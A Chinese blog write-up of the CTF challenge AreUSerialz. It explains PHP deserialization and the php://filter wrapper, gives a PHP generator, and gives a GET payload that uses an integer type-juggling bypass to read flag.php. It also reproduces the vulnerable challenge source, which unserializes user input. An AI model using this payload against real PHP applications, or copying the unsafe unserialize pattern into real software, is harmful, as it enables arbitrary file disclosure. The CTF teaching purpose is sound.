练习 23 Web [网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-06-14 09:22:46 发布

离暑假还有41天

最新推荐文章于 2024-06-14 09:22:46 发布

阅读量705

点赞数 6

分类专栏： CTF WriteUp 文章标签： php

本文链接：https://blog.csdn.net/qq_42212961/article/details/137413753

版权

CTF WriteUp 专栏收录该内容

26 篇文章 0 订阅

订阅专栏

反序列化的执行顺序复习
file_get_content()可以读取php://filter伪协议
参考博客：一篇很全的PHP伪协议总结

打开靶机直接给了我们php代码（贴在最后）
反序列化

复习自己练习17中的内容
本题中出现的两个魔术方法

__construct()：当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。（构造函数）
__destruct()：当对象被销毁时会自动调用。（析构函数）

以及protected属性在序列化的时候需要修改

各访问修饰符序列化后的区别： public：属性被序列化的时候属性名还是原来的属性名，没有任何改变
protected：属性被序列化的时候属性名会变成%00*%00属性名，长度跟随属性名长度而改变
private：属性被序列化的时候属性名会变成%00类名%00属性名，长度跟随属性名长度而改变

根据代码：

GET传参
同时 if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))要求str全部是可打印字符
需要op===2，强类型比较后，op置为1，然后执行$this->content = ""; $this->process();
process()中，op==1和op==2执行的结果不同，继续看代码

  public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

只有read()函数中这个file_get_contents($this->filename);我们可以改参数
那么需要op==2 第一个属性值确定
同时这个file_get_contents($this->filename);是读取文件内容，那么练习13中遇到的PHP
伪造文件读取协议：filename='php://filter/read=convert.base64-encode/resource=./flag.php‘

private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

最后output输出

那构建原始payload：

<?php
    class FileHandler{
        protected $op = 2；
        protected $filename='php://filter/read=convert.base64-encode/resource=flag.php';
        protected $content;
    }

    $str = new FileHandler();
    $s = serialize($str);
    echo $s;
?>

手动序列化

这串字符的含义：
变量类型；类名长度；类名；属性变量个数 {属性类型；属性名长度；属性名；属性值类型；属性值长度；属性值内容}
o表示object对象
11 表示对象名称有11个字符
FileHandler 对象名称
3 表示只有3个属性值
s 表示 string 字符串 i 表示数字

# 最后的N 是指conten这个属性没有赋值
?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

在这里插入图片描述
复习练习21，注意base64，32，16
这一看就是base64
解码一次flag{f75af198-e117-4c32-b99f-d3bb0cf3a40f}

附题目源码：

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}